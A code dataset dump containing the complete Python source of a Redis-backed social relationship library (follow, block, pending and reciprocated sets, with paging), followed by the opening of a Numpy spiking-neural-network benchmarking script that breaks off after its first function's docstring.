| 13.333333 | 28 | 0.625 | 5 | 40 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 40 | 2 | 29 | 20 | 0.78125 | 0 | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0.5 | 0 | 1 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
e85d6691c5c32e6835916976d8e9927201ff481b | 38,289 | py | Python | amico/amico.py | agoragames/amico-python | 1d2d9593bc3ac41247bb64c32efea1d2050807d1 | [
"MIT"
] | 1 | 2015-09-03T23:47:54.000Z | 2015-09-03T23:47:54.000Z | amico/amico.py | agoragames/amico-python | 1d2d9593bc3ac41247bb64c32efea1d2050807d1 | [
"MIT"
] | null | null | null | amico/amico.py | agoragames/amico-python | 1d2d9593bc3ac41247bb64c32efea1d2050807d1 | [
"MIT"
] | 2 | 2018-11-22T09:34:07.000Z | 2020-04-30T11:41:06.000Z | import math
import time
import redis
class Amico(object):
VERSION = '1.0.1'
DEFAULTS = {
'namespace': 'amico',
'following_key': 'following',
'followers_key': 'followers',
'blocked_key': 'blocked',
'blocked_by_key': 'blocked_by',
'reciprocated_key': 'reciprocated',
'pending_key': 'pending',
'pending_with_key': 'pending_with',
'pending_follow': False,
'default_scope_key': 'default',
'page_size': 25
}
def __init__(self, options=DEFAULTS, redis_connection=None):
'''
Initialize a new class for establishing relationships.
@param options [dictionary] (Default: Amico.DEFAULTS)
@param redis_connection [redis] (Default: None) Redis connection
'''
self.options = Amico.DEFAULTS.copy()
self.options.update(options)
if redis_connection is None:
self.redis_connection = redis.StrictRedis(
host='localhost',
port=6379,
db=0)
else:
self.redis_connection = redis_connection
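    # A minimal construction sketch (assumes a Redis server reachable on
    # localhost:6379; the option value shown is hypothetical):
    #   amico = Amico(options={'pending_follow': True},
    #                 redis_connection=redis.StrictRedis(host='localhost', port=6379, db=0))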
def follow(self, from_id, to_id, scope=None):
'''
Establish a follow relationship between two IDs. After adding the follow
relationship, it checks to see if the relationship is reciprocated and establishes that
relationship if so.
@param from_id [String] The ID of the individual establishing the follow relationship.
@param to_id [String] The ID of the individual to be followed.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
if self.is_blocked(to_id, from_id, scope):
return
if self.options['pending_follow'] and self.is_pending(from_id, to_id, scope):
return
if self.options['pending_follow']:
transaction = self.redis_connection.pipeline()
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['pending_key'], scope, to_id), int(
time.time()), from_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['pending_with_key'], scope, from_id), int(
time.time()), to_id)
transaction.execute()
else:
self.__add_following_followers_reciprocated(from_id, to_id, scope)
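    # A minimal usage sketch, assuming the default options above
    # (pending_follow is False); the IDs are hypothetical strings:
    #   amico.follow('1', '11')
    #   amico.is_following('1', '11')     # => True
    #   amico.follow('11', '1')
    #   amico.is_reciprocated('1', '11')  # => True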
def unfollow(self, from_id, to_id, scope=None):
'''
Remove a follow relationship between two IDs. After removing the follow
relationship, if a reciprocated relationship was established, it is
also removed.
@param from_id [String] The ID of the individual removing the follow relationship.
@param to_id [String] The ID of the individual to be unfollowed.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
transaction = self.redis_connection.pipeline()
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
from_id),
to_id)
transaction.execute()
def block(self, from_id, to_id, scope=None):
'''
Block a relationship between two IDs. This method also has the side effect
of removing any follower or following relationship between the two IDs.
@param from_id [String] The ID of the individual blocking the relationship.
@param to_id [String] The ID of the individual being blocked.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
transaction = self.redis_connection.pipeline()
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
to_id),
from_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['blocked_key'], scope, from_id), int(
time.time()), to_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['blocked_by_key'], scope, to_id), int(
time.time()), from_id)
transaction.execute()
def unblock(self, from_id, to_id, scope=None):
'''
Unblock a relationship between two IDs.
@param from_id [String] The ID of the individual unblocking the relationship.
@param to_id [String] The ID of the blocked individual.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
transaction = self.redis_connection.pipeline()
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
to_id),
from_id)
transaction.execute()
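    # A minimal block/unblock sketch (hypothetical IDs):
    #   amico.block('1', '11')        # also severs any existing follow relationships
    #   amico.is_blocked('1', '11')   # => True
    #   amico.follow('11', '1')       # silently ignored while '1' blocks '11'
    #   amico.unblock('1', '11')
    #   amico.is_blocked('1', '11')   # => False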
def accept(self, from_id, to_id, scope=None):
'''
Accept a relationship that is pending between two IDs.
@param from_id [String] The ID of the individual accepting the relationship.
@param to_id [String] The ID of the individual to be accepted.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
self.__add_following_followers_reciprocated(from_id, to_id, scope)
def deny(self, from_id, to_id, scope=None):
'''
Deny a relationship that is pending between two IDs.
@param from_id [String] The ID of the individual denying the relationship.
@param to_id [String] The ID of the individual to be denied.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
transaction = self.redis_connection.pipeline()
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
from_id),
to_id)
transaction.execute()
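    # A minimal pending-follow sketch, assuming the instance was created with
    # 'pending_follow': True (hypothetical IDs):
    #   amico.follow('1', '11')
    #   amico.is_pending('1', '11')    # => True until '11' acts on the request
    #   amico.accept('1', '11')        # or: amico.deny('1', '11')
    #   amico.is_following('1', '11')  # => True after accept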
def clear(self, id, scope=None):
'''
Clears all relationships (in either direction) stored for an individual.
Helpful to prevent orphaned associations when deleting users.
@param id [String] ID of the individual to clear info for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
# no longer following (or followed by) anyone
self.__clear_bidirectional_sets_for_id(
id,
self.options['following_key'],
self.options['followers_key'],
scope)
self.__clear_bidirectional_sets_for_id(
id,
self.options['followers_key'],
self.options['following_key'],
scope)
self.__clear_bidirectional_sets_for_id(
id,
self.options['reciprocated_key'],
self.options['reciprocated_key'],
scope)
# no longer blocked by (or blocking) anyone
self.__clear_bidirectional_sets_for_id(
id,
self.options['blocked_by_key'],
self.options['blocked_key'],
scope)
self.__clear_bidirectional_sets_for_id(
id,
self.options['blocked_key'],
self.options['blocked_by_key'],
scope)
# no longer pending with anyone (or have any pending followers)
self.__clear_bidirectional_sets_for_id(
id,
self.options['pending_with_key'],
self.options['pending_key'],
scope)
self.__clear_bidirectional_sets_for_id(
id,
self.options['pending_key'],
self.options['pending_with_key'],
scope)
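    # A minimal sketch (hypothetical ID): amico.clear('1') removes '1' from
    # every relationship set, in both directions, across all seven key types.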
def is_blocked(self, id, blocked_id, scope=None):
'''
Check to see if one individual has blocked another individual.
@param id [String] ID of the individual checking the blocked status.
@param blocked_id [String] ID of the individual to see if they are blocked by id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
id),
blocked_id) is not None
def is_blocked_by(self, id, blocked_by_id, scope=None):
'''
Check to see if one individual is blocked by another individual.
@param id [String] ID of the individual checking the blocked by status.
        @param blocked_by_id [String] ID of the individual to see if they have blocked id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
id),
blocked_by_id) is not None
def is_follower(self, id, follower_id, scope=None):
'''
Check to see if one individual is a follower of another individual.
@param id [String] ID of the individual checking the follower status.
        @param follower_id [String] ID of the individual to see if they are following id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
id),
follower_id) is not None
def is_following(self, id, following_id, scope=None):
'''
Check to see if one individual is following another individual.
@param id [String] ID of the individual checking the following status.
@param following_id [String] ID of the individual to see if they are being followed by id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
id),
following_id) is not None
def is_reciprocated(self, from_id, to_id, scope=None):
'''
Check to see if one individual has reciprocated in following another individual.
@param from_id [String] ID of the individual checking the reciprocated relationship.
@param to_id [String] ID of the individual to see if they are following from_id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.is_following(
from_id,
to_id,
scope) and self.is_following(
to_id,
from_id,
scope)
def is_pending(self, from_id, to_id, scope=None):
'''
Check to see if one individual has a pending relationship in following another individual.
@param from_id [String] ID of the individual checking the pending relationships.
@param to_id [String] ID of the individual to see if they are pending a follow from from_id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
to_id),
from_id) is not None
def is_pending_with(self, from_id, to_id, scope=None):
'''
Check to see if one individual has a pending relationship with another.
@param from_id [String] ID of the individual checking the pending relationships.
@param to_id [String] ID of the individual to see if they are pending an approval from from_id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
to_id),
from_id) is not None
def following_count(self, id, scope=None):
'''
Count the number of individuals that someone is following.
@param id [String] ID of the individual to retrieve following count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
id))
def followers_count(self, id, scope=None):
'''
Count the number of individuals that are following someone.
@param id [String] ID of the individual to retrieve followers count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
id))
def blocked_count(self, id, scope=None):
'''
Count the number of individuals that someone has blocked.
@param id [String] ID of the individual to retrieve blocked count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
id))
def blocked_by_count(self, id, scope=None):
'''
        Count the number of individuals that have blocked someone.
@param id [String] ID of the individual to retrieve blocked_by count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
id))
def reciprocated_count(self, id, scope=None):
'''
Count the number of individuals that have reciprocated a following relationship.
@param id [String] ID of the individual to retrieve reciprocated following count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
id))
def pending_count(self, id, scope=None):
'''
Count the number of relationships pending for an individual.
@param id [String] ID of the individual to retrieve pending count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
id))
def pending_with_count(self, id, scope=None):
'''
Count the number of relationships an individual has pending with another.
@param id [String] ID of the individual to retrieve pending count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
id))
def following(self, id, page_options=None, scope=None):
'''
Retrieve a page of followed individuals for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of followed individuals.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
id),
page_options)
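    # A minimal paging sketch (page numbering starts at 1, matching the
    # page_options dict built in `all` below; values are hypothetical):
    #   amico.following('1')                                # first page, default page size
    #   amico.following('1', {'page': 2, 'page_size': 10})  # second page of 10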
def followers(self, id, page_options=None, scope=None):
'''
Retrieve a page of followers for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of followers.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
id),
page_options)
def blocked(self, id, page_options=None, scope=None):
'''
Retrieve a page of blocked individuals for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of blocked individuals.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
id),
page_options)
def blocked_by(self, id, page_options=None, scope=None):
'''
Retrieve a page of individuals who have blocked a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of blocking individuals.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
id),
page_options)
def reciprocated(self, id, page_options=None, scope=None):
'''
Retrieve a page of individuals that have reciprocated a follow for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of individuals that have reciprocated a follow.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
id),
page_options)
def pending(self, id, page_options=None, scope=None):
'''
Retrieve a page of pending relationships for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of pending relationships.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
id),
page_options)
def pending_with(self, id, page_options=None, scope=None):
'''
Retrieve a page of individuals that are waiting to approve the given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of pending relationships.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
id),
page_options)
def following_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of following relationships for an individual.
@param id [String] ID of the individual.
        @param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
id),
page_size)
def followers_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of follower relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
id),
page_size)
def blocked_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of blocked relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
id),
page_size)
def blocked_by_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of blocked_by relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
id),
page_size)
def reciprocated_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of reciprocated relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
id),
page_size)
def pending_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of pending relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
id),
page_size)
def pending_with_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of individuals waiting to approve another individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
id),
page_size)
def all(self, id, type, scope=None):
'''
Retrieve all of the individuals for a given id, type (e.g. following) and scope
@param id [String] ID of the individual.
@param type [String] One of 'following', 'followers', 'reciprocated', 'blocked', 'blocked_by', 'pending', 'pending_with'.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
self.__validate_relationship_type(type)
count = getattr(self, '%s_count' % type)(id, scope)
if count > 0:
            return getattr(self, type)(
                id, {'page_size': count, 'page': 1}, scope)
else:
return []
def count(self, id, type, scope=None):
'''
Retrieve a count of all of a given type of relationship for the specified id.
@param id [String] ID of the individual.
@param type [String] One of 'following', 'followers', 'reciprocated', 'blocked', 'blocked_by', 'pending', 'pending_with'.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
self.__validate_relationship_type(type)
return getattr(self, '%s_count' % type)(id, scope)
def page_count(self, id, type, page_size=None, scope=None):
'''
Retrieve a page count of a given type of relationship for the specified id.
@param id [String] ID of the individual.
@param type [String] One of 'following', 'followers', 'reciprocated', 'blocked', 'blocked_by', 'pending', 'pending_with'.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if page_size is None:
page_size = self.DEFAULTS['page_size']
if scope is None:
scope = self.options['default_scope_key']
self.__validate_relationship_type(type)
return getattr(self, '%s_page_count' % type)(id, page_size, scope)
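    # A brief usage sketch for the generic helpers above (hypothetical instance `amico`;
    # IDs are illustrative):
    #   amico.all('1', 'following')         # every ID that '1' follows
    #   amico.count('1', 'followers')       # total number of followers for '1'
    #   amico.page_count('1', 'pending')    # number of pages of pending requests for '1'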
# private methods
    # Valid relationship types that can be used in #all, #count, #page_count,
    # etc.
VALID_RELATIONSHIPS = [
'following',
'followers',
'reciprocated',
'blocked',
'blocked_by',
'pending',
'pending_with']
def __validate_relationship_type(self, type):
'''
Ensure that a relationship type is valid.
@param type [String] One of 'following', 'followers', 'reciprocated', 'blocked', 'blocked_by', 'pending', 'pending_with'.
        @raise [Exception] if the type is not included in VALID_RELATIONSHIPS
'''
if type not in self.VALID_RELATIONSHIPS:
            raise Exception('Invalid relationship type given: %s' % type)
def __clear_bidirectional_sets_for_id(
self,
id,
source_set_key,
related_set_key,
scope=None):
'''
        Remove references to an individual from sets that are keyed by other individuals' IDs.
        Assumes two set keys that are used together, such as followers/following, blocked/blocked_by, etc.
        @param id [String] The ID of the individual to clear info for.
        @param source_set_key [String] The key identifying the source set to iterate over.
        @param related_set_key [String] The key identifying the sets that the individual needs to be removed from.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
related_ids = self.redis_connection.zrange(
'%s:%s:%s:%s' %
(self.options['namespace'], source_set_key, scope, id), 0, -1)
transaction = self.redis_connection.pipeline()
        for related_id in related_ids:
            # Queue removals on the pipeline so transaction.execute() runs them as one batch
            # (calling zrem on the bare connection here bypassed the pipeline).
            transaction.zrem(
                '%s:%s:%s:%s' %
                (self.options['namespace'],
                 related_set_key,
                 scope,
                 related_id),
                id)
transaction.execute()
self.redis_connection.delete(
'%s:%s:%s:%s' %
(self.options['namespace'], source_set_key, scope, id))
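    # Key layout sketch (values illustrative): with a namespace of 'amico' and scope 'default',
    # clearing id '1' against the following/followers pair reads the members of
    # 'amico:following:default:1' and removes '1' from each
    # 'amico:followers:default:<related_id>' before deleting the source set itself.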
def __add_following_followers_reciprocated(
self,
from_id,
to_id,
scope=None):
        '''
        Add the following and followers entries and check for a reciprocated relationship.
        To be used from the follow and accept methods.
        @param from_id [String] The ID of the individual establishing the follow relationship.
        @param to_id [String] The ID of the individual to be followed.
        @param scope [String] Scope for the call.
        '''
if scope is None:
scope = self.options['default_scope_key']
transaction = self.redis_connection.pipeline()
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['following_key'], scope, from_id), int(
time.time()), to_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['followers_key'], scope, to_id), int(
time.time()), from_id)
        # zrem takes only members (no scores); the timestamp argument previously passed here
        # was a zadd-style leftover.
        transaction.zrem(
            '%s:%s:%s:%s' %
            (self.options['namespace'], self.options['pending_key'], scope, to_id),
            from_id)
        transaction.zrem(
            '%s:%s:%s:%s' %
            (self.options['namespace'], self.options['pending_with_key'], scope, from_id),
            to_id)
transaction.execute()
if self.is_reciprocated(from_id, to_id, scope):
transaction = self.redis_connection.pipeline()
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['reciprocated_key'], scope, from_id), int(
time.time()), to_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['reciprocated_key'], scope, to_id), int(
time.time()), from_id)
transaction.execute()
def __total_pages(self, key, page_size):
'''
Count the total number of pages for a given key in a Redis sorted set.
@param key [String] Redis key.
@param page_size [int] Page size from which to calculate total pages.
@return total number of pages for a given key in a Redis sorted set.
'''
return int(
math.ceil(
self.redis_connection.zcard(key) /
float(page_size)))
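    # Worked example: if zcard(key) == 25 and page_size == 10, the result is
    # int(math.ceil(25 / 10.0)) == 3 pages.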
def __default_paging_options(self):
'''
Default paging options.
@return a hash of the default paging options.
'''
default_options = {
'page_size': self.DEFAULTS['page_size'],
'page': 1
}
return default_options
def __members(self, key, options=None):
'''
Retrieve a page of items from a Redis sorted set without scores.
@param key [String] Redis key.
@param options [Hash] Default options for paging.
@return a page of items from a Redis sorted set without scores.
'''
if options is None:
options = self.__default_paging_options()
if options['page'] < 1:
options['page'] = 1
total_pages = self.__total_pages(key, options['page_size'])
if options['page'] > total_pages:
options['page'] = total_pages
index_for_redis = options['page'] - 1
starting_offset = (index_for_redis * options['page_size'])
if starting_offset < 0:
starting_offset = 0
ending_offset = (starting_offset + options['page_size']) - 1
return self.redis_connection.zrevrange(
key,
starting_offset,
ending_offset,
withscores=False)
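    # Paging example: options == {'page': 2, 'page_size': 10} gives index_for_redis == 1,
    # starting_offset == 10 and ending_offset == 19, i.e. zrevrange(key, 10, 19).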
| 34.156111 | 129 | 0.559403 | 4,489 | 38,289 | 4.611495 | 0.047672 | 0.016811 | 0.016811 | 0.011207 | 0.824308 | 0.797256 | 0.776146 | 0.753877 | 0.745326 | 0.728274 | 0 | 0.000828 | 0.337355 | 38,289 | 1,120 | 130 | 34.186607 | 0.815072 | 0.294993 | 0 | 0.791789 | 0 | 0 | 0.133406 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065982 | false | 0 | 0.004399 | 0 | 0.139296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e88585977c3075335ee08006773309d24964f611 | 22,157 | py | Python | benchmarking/thresholdVaryConnectivity/test_thresholds_varying_connectivity.py | wnourse05/SNS-Toolbox | 2fbb9332aadd6eb3a71f0519e69d7b0ad273b7b0 | [
"Apache-2.0"
] | null | null | null | benchmarking/thresholdVaryConnectivity/test_thresholds_varying_connectivity.py | wnourse05/SNS-Toolbox | 2fbb9332aadd6eb3a71f0519e69d7b0ad273b7b0 | [
"Apache-2.0"
] | null | null | null | benchmarking/thresholdVaryConnectivity/test_thresholds_varying_connectivity.py | wnourse05/SNS-Toolbox | 2fbb9332aadd6eb3a71f0519e69d7b0ad273b7b0 | [
"Apache-2.0"
] | null | null | null | """
Implement the Numpy backend, and collect timing information with different parameters
William Nourse
August 26th, 2021
I have set myself beyond the pale. I am nothing. I am hardly human anymore.
"""
import numpy as np
import pickle
import time
import sys
"""
########################################################################################################################
NETWORK STEP
Update all of the neural states for 1 timestep
"""
def stepAll(inputConnectivity, inputVals, Ulast, timeFactorMembrane, Gm, Ib, thetaLast, timeFactorThreshold, theta0, m, refCtr,
refPeriod, GmaxNon, GmaxSpk, Gspike, timeFactorSynapse, DelE, outputVoltageConnectivity,
outputSpikeConnectivity, R=20):
"""
All components are present
:param inputConnectivity: Matrix describing routing of input currents
:param inputVals: Value of input currents (nA)
:param Ulast: Vector of neural states at the previous timestep (mV)
:param timeFactorMembrane: Vector of constant parameters for each neuron (dt/Cm)
:param Gm: Vector of membrane conductances (uS)
:param Ib: Vector of bias currents (nA)
:param thetaLast: Firing threshold at the previous timestep (mV)
:param timeFactorThreshold: Vector of constant parameters for each neuron (dt/tauTheta)
:param theta0: Vector of initial firing thresholds (mV)
:param m: Vector of threshold adaptation ratios
:param refCtr: Vector to store remaining timesteps in the refractory period
:param refPeriod: Vector of refractory periods
:param GmaxNon: Matrix of maximum nonspiking synaptic conductances (uS)
:param GmaxSpk: Matrix of maximum spiking synaptic conductances (uS)
:param Gspike: Matrix of spiking synaptic conductances (uS)
:param timeFactorSynapse: Matrix of constant parameters for each synapse (dt/tau_syn)
:param DelE: Matrix of synaptic reversal potentials
:param outputVoltageConnectivity: Matrix describing routes to output nodes
:param outputSpikeConnectivity: Matrix describing routes to output nodes
:param R: Neural range (mV)
    :return: U, Ulast, thetaLast, Gspike, refCtr, outputVoltages, outputSpikes, and the elapsed step time (s)
"""
start = time.time()
